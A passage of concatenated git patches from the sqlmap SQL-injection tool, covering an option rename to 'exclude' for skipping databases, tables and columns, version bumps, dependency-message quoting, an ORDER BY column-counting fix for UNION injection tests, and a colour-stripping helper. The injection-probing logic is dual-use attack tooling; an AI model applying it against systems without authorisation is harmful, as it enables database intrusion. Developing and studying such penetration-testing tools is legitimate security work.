-763aa317d43909a51dd4c2f36834718d tamper/commalesslimit.py +6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py 211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py 19acfde79c9a2d8458e15182f5b73d71 tamper/commentbeforeparentheses.py -61f895acaaf3dea78e237bdf5fe30a81 tamper/concat2concatws.py +334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py 06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py @@ -250,15 +250,15 @@ e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py -b7e892fc185927c7eb4a604f87b8b6c1 tamper/modsecurityversioned.py -a15ae5a795661fe992bb476346d54794 tamper/modsecurityzeroversioned.py +de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py +39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py b4cadf2ddcdc0598c9a3bf24521a2fa1 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py -b30240804cce482b6ab77714508de89c tamper/plus2concat.py -a8f4a85be6e98b53060b066cd18eed15 tamper/plus2fnconcat.py +91272e566ceb4644254cd6abd613db21 tamper/plus2concat.py +265314f4b3b921f4c0d470ddaa6506e4 tamper/plus2fnconcat.py e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py 6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py 48228322d40d97016b05e408c5234634 tamper/securesphere.py From e2cc9569e531e017bd2dd0aaab64d7671b0d1b0c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Feb 2018 15:53:50 +0100 Subject: [PATCH 033/428] Implementation for an Issue #2891 --- lib/core/option.py | 4 ++-- lib/core/optiondict.py | 2 +- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 4 ++-- plugins/dbms/maxdb/enumeration.py | 4 ++-- plugins/dbms/mssqlserver/enumeration.py | 29 +++++++++++++++++++------ plugins/dbms/sybase/enumeration.py | 4 ++-- plugins/generic/databases.py | 9 ++++++-- plugins/generic/entries.py | 26 +++++++++++++++++----- plugins/generic/search.py | 4 ++-- sqlmap.conf | 4 ++-- txt/checksum.md5 | 20 ++++++++--------- 12 files changed, 74 insertions(+), 38 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index b8d784cf59e..e3ace6ec65f 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1785,8 +1785,8 @@ def _cleanupOptions(): if conf.col: conf.col = re.sub(r"\s*,\s*", ',', conf.col) - if conf.excludeCol: - conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol) + if conf.exclude: + conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude) if conf.binaryFields: conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index ba79baa9166..e71e4b3f179 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -139,7 +139,7 @@ "db": "string", "tbl": "string", "col": "string", - "excludeCol": "string", + "exclude": "string", "pivotColumn": "string", "dumpWhere": "string", "user": "string", diff --git a/lib/core/settings.py b/lib/core/settings.py index 05ed12b9549..e4dad087f38 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.10" +VERSION = "1.2.2.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 776ed35fe79..83161b686f2 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -464,8 +464,8 @@ def cmdLineParser(argv=None): enumeration.add_option("-C", dest="col", help="DBMS database table column(s) to enumerate") - enumeration.add_option("-X", dest="excludeCol", - help="DBMS database table column(s) to not enumerate") + enumeration.add_option("-X", dest="exclude", + help="DBMS database identifier(s) to not enumerate") enumeration.add_option("-U", dest="user", help="DBMS user to enumerate") diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 3ab5770a738..79a2c958708 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -120,8 +120,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod else: colList = [] - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 83b1a4ff40f..c0eec311b2e 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -14,6 +14,7 @@ from lib.core.common import isTechniqueAvailable from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import safeStringFormat +from lib.core.common import singleTimeLogMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf @@ -94,8 +95,12 @@ def getTables(self): for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3): @@ -113,8 +118,12 @@ def getTables(self): for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue infoMsg = "fetching number of tables for " @@ -199,8 +208,12 @@ def searchTable(self): if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -271,8 +284,8 @@ def searchColumn(self): infoMsgDb = "" colList = conf.col.split(',') - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] origTbl = conf.tbl origDb = conf.db @@ -318,8 +331,7 @@ def searchColumn(self): _ = conf.db.split(',') infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: - msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(msg) + infoMsgDb = " not in system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) else: infoMsgDb = " across all databases" @@ -334,6 +346,9 @@ def searchColumn(self): if conf.excludeSysDbs and db in self.excludeDbsList: continue + if conf.exclude and db in conf.exclude.split(','): + continue + if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: query = rootQuery.inband.query % (db, db, db, db, db, db) query += " AND %s" % colQuery.replace("[DB]", db) diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index a55d31a2e34..2b5f2d6f3a7 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -188,8 +188,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod else: colList = [] - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 36c00b4f226..02fce6b7af5 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -23,6 +23,7 @@ from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming @@ -298,7 +299,11 @@ def getTables(self, bruteForce=None): if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) + continue + if conf.exclude and db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(db) + singleTimeLogMessage(infoMsg) continue infoMsg = "fetching number of tables for " @@ -410,8 +415,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod else: colList = [] - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 66a2eb2b56a..0fab15af1ec 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -22,6 +22,7 @@ from lib.core.common import prioritySortColumns from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import singleTimeLogMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf @@ -68,11 +69,16 @@ def dumpTable(self, foundData=None): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) + if conf.exclude and conf.db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + singleTimeLogMessage(infoMsg) + return + conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: @@ -99,6 +105,11 @@ def dumpTable(self, foundData=None): tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: + if conf.exclude and tbl in conf.exclude.split(','): + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) + singleTimeLogMessage(infoMsg) + continue + conf.tbl = tbl kb.data.dumpedTable = {} @@ -129,8 +140,8 @@ def dumpTable(self, foundData=None): columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] colList = sorted(filter(None, columns.keys())) - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] if not colList: warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) @@ -465,6 +476,11 @@ def dumpAll(self): conf.db = db for table in tables: + if conf.exclude and table in conf.exclude.split(','): + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) + logger.info(infoMsg) + continue + try: conf.tbl = table kb.data.cachedColumns = {} @@ -530,8 +546,8 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): conf.tbl = table colList = filter(None, sorted(columns)) - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] conf.col = ','.join(colList) kb.data.cachedColumns = {} diff --git a/plugins/generic/search.py b/plugins/generic/search.py index b5d86042377..e07e98bf6eb 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -371,8 +371,8 @@ def searchColumn(self): infoMsgDb = "" colList = conf.col.split(',') - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] origTbl = conf.tbl origDb = conf.db diff --git a/sqlmap.conf b/sqlmap.conf index 77849ce719f..522e02df011 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -494,8 +494,8 @@ tbl = # Back-end database management system database table column(s) to enumerate. col = -# Back-end database management system database table column(s) to not enumerate. -excludeCol = +# Back-end database management system identifiers (database(s), table(s) and column(s)) to not enumerate. +exclude = # Pivot column name. pivotColumn = diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8c0dd8ba81f..2d513f00e57 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -39,14 +39,14 @@ c8551f7696a76450e6d139409e4f06cd lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -9eed2d4d370f375bda5e0c0488740e7f lib/core/optiondict.py -02c846bf9fddbcb75afed72c0d6b9bdc lib/core/option.py +63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py +785746cab318fe550d98c37296a0a888 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -659fe726d16a8b4557d96d82181ace88 lib/core/settings.py +5c1731dff66559f45f9f6ab7d85335df lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -57,7 +57,7 @@ c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -a6912de35b7184e2e8b1fe2510c0c333 lib/parse/cmdline.py +27c4d3e568d199e01d1cffd37b370516 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 263ee1cec41facd2a06d0dc887b207ad lib/parse/headers.py @@ -153,14 +153,14 @@ da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py 1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py 6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py -b2df2dfaa44659ac02df396fb2174d23 plugins/dbms/maxdb/enumeration.py +615be11d750530211af244b6ca6aef14 plugins/dbms/maxdb/enumeration.py ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/mssqlserver/connector.py -fdc3cc66d0d35f6ebee0dd625a87f4e9 plugins/dbms/mssqlserver/enumeration.py +a833fbc30ab1133bc6ba293d97d0ef7c plugins/dbms/mssqlserver/enumeration.py 7e495d786fa8e1da96e73e2905bbd7dd plugins/dbms/mssqlserver/filesystem.py 03d463c15ebbfa4e49155b261b59db31 plugins/dbms/mssqlserver/fingerprint.py affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py @@ -195,7 +195,7 @@ f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py 964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py 3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py 6439d15c1e8cdb069056c4fa725326df plugins/dbms/sybase/connector.py -006b647e955d7638687d16e047e9c587 plugins/dbms/sybase/enumeration.py +31462dc5a1cd2a1b4eba6762d18fb48c plugins/dbms/sybase/enumeration.py 74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py @@ -203,14 +203,14 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -315a3ced9667065b24de040af296037a plugins/generic/databases.py -b1bd764e8f417222ebb1890232290679 plugins/generic/entries.py +554f925e0a66f62b8ba39dd6c95d1e7f plugins/generic/databases.py +764a8fd5a99224910885c6b94a592170 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py -8995e814cb8e854bd77534f687535014 plugins/generic/search.py +b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py 4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py From 8e8ae5228843ce50faa83aba72b9989f07bfab38 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Feb 2018 23:10:53 +0100 Subject: [PATCH 034/428] Minor text update --- lib/core/settings.py | 2 +- lib/utils/deps.py | 12 ++++++------ txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e4dad087f38..8b355eae53f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.11" +VERSION = "1.2.2.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/deps.py b/lib/utils/deps.py index fd0d4e14e56..835cb3568b3 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -25,7 +25,7 @@ def checkDependencies(): if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": warnMsg = "'%s' third-party library must be " % data[1] warnMsg += "version >= 1.0.2 to work properly. " - warnMsg += "Download from %s" % data[2] + warnMsg += "Download from '%s'" % data[2] logger.warn(warnMsg) elif dbmsName == DBMS.MYSQL: __import__("pymysql") @@ -49,7 +49,7 @@ def checkDependencies(): except: warnMsg = "sqlmap requires '%s' third-party library " % data[1] warnMsg += "in order to directly connect to the DBMS " - warnMsg += "'%s'. Download from %s" % (dbmsName, data[2]) + warnMsg += "'%s'. Download from '%s'" % (dbmsName, data[2]) logger.warn(warnMsg) missing_libraries.add(data[1]) @@ -65,7 +65,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg += "out-of-band takeover feature. Download from " - warnMsg += "http://code.google.com/p/impacket/" + warnMsg += "'http://code.google.com/p/impacket/'" logger.warn(warnMsg) missing_libraries.add('python-impacket') @@ -76,7 +76,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'python-ntlm' third-party library " warnMsg += "if you plan to attack a web application behind NTLM " - warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/" + warnMsg += "authentication. Download from 'http://code.google.com/p/python-ntlm/'" logger.warn(warnMsg) missing_libraries.add('python-ntlm') @@ -87,7 +87,7 @@ def checkDependencies(): except ImportError: warnMsg = "sqlmap requires 'websocket-client' third-party library " warnMsg += "if you plan to attack a web application using WebSocket. " - warnMsg += "Download from https://pypi.python.org/pypi/websocket-client/" + warnMsg += "Download from 'https://pypi.python.org/pypi/websocket-client/'" logger.warn(warnMsg) missing_libraries.add('websocket-client') @@ -101,7 +101,7 @@ def checkDependencies(): warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "completion and history support features in the SQL " warnMsg += "shell and OS shell. Download from " - warnMsg += "http://ipython.scipy.org/moin/PyReadline/Intro" + warnMsg += "'http://ipython.scipy.org/moin/PyReadline/Intro'" logger.warn(warnMsg) missing_libraries.add('python-pyreadline') diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2d513f00e57..cfe951cd886 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5c1731dff66559f45f9f6ab7d85335df lib/core/settings.py +fea9bf09e60f66f4f0b1e9cac64dd842 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -101,7 +101,7 @@ c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py -985c737cd8a6a722160c55cf5ee224f4 lib/utils/deps.py +69c25da85a3a71a9798804075cdfd62b lib/utils/deps.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py From 5ff54bf9c621b56aad8fb882f93244071e285830 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 14 Feb 2018 17:10:44 +0100 Subject: [PATCH 035/428] Fixes #2934 --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 12 ++++++------ txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8b355eae53f..faa3b38ff3a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.12" +VERSION = "1.2.2.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index ce659ec01e7..3d621e89860 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -48,7 +48,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where= """ retVal = None - def _orderByTechnique(): + def _orderByTechnique(lowerCount, upperCount): def _orderByTest(cols): query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix) query = agent.suffixQuery(query, suffix=suffix, comment=comment) @@ -56,7 +56,7 @@ def _orderByTest(cols): page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) - if _orderByTest(1) and not _orderByTest(randomInt()): + if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " infoMsg += "This should reduce the time needed " infoMsg += "to find the right number " @@ -64,10 +64,10 @@ def _orderByTest(cols): infoMsg += "range for current UNION query injection technique test" singleTimeLogMessage(infoMsg) - lowCols, highCols = 1, ORDER_BY_STEP + lowCols, highCols = 1 if lowerCount is None else lowerCount, ORDER_BY_STEP if upperCount is None else upperCount found = None while not found: - if _orderByTest(highCols): + if not conf.uCols and _orderByTest(highCols): lowCols = highCols highCols += ORDER_BY_STEP else: @@ -88,8 +88,8 @@ def _orderByTest(cols): kb.errorIsNone = False lowerCount, upperCount = conf.uColsStart, conf.uColsStop - if lowerCount == 1: - found = kb.orderByColumns or _orderByTechnique() + if lowerCount == 1 or conf.uCols: + found = kb.orderByColumns or _orderByTechnique(lowerCount, upperCount) if found: kb.orderByColumns = found infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index cfe951cd886..050b6f121c0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fea9bf09e60f66f4f0b1e9cac64dd842 lib/core/settings.py +7735e472a2d2661744bd6d04fd1c387d lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -96,7 +96,7 @@ b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 627ddc86a5a969e5509c7531c5c27a6c lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py +e58ab8029ffb2cc37e42d68747c4da39 lib/techniques/union/test.py 6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From f38596a5b30b890cc1f2aa4daf62a8e1799cd9d3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 20 Feb 2018 14:02:02 +0100 Subject: [PATCH 036/428] Minor refactoring --- lib/core/common.py | 17 ++++++++++++++++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 19 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 67631b110e1..f81cb1df979 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -889,6 +889,21 @@ def setColor(message, bold=False): return retVal +def clearColors(message): + """ + Clears ANSI color codes + + >>> clearColors("\x1b[38;5;82mHello \x1b[38;5;198mWorld") + 'Hello World' + """ + + retVal = message + + if message: + retVal = re.sub(r"\x1b\[[\d;]+m", "", message) + + return retVal + def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=CONTENT_STATUS.IN_PROGRESS): """ Writes text to the stdout (console) stream @@ -1178,7 +1193,7 @@ def banner(): _ = BANNER if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv: - _ = re.sub("\033.+?m", "", _) + _ = clearColors(_) elif IS_WIN: coloramainit() diff --git a/lib/core/settings.py b/lib/core/settings.py index faa3b38ff3a..625e335ec7f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.13" +VERSION = "1.2.2.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 050b6f121c0..3a13b83de66 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 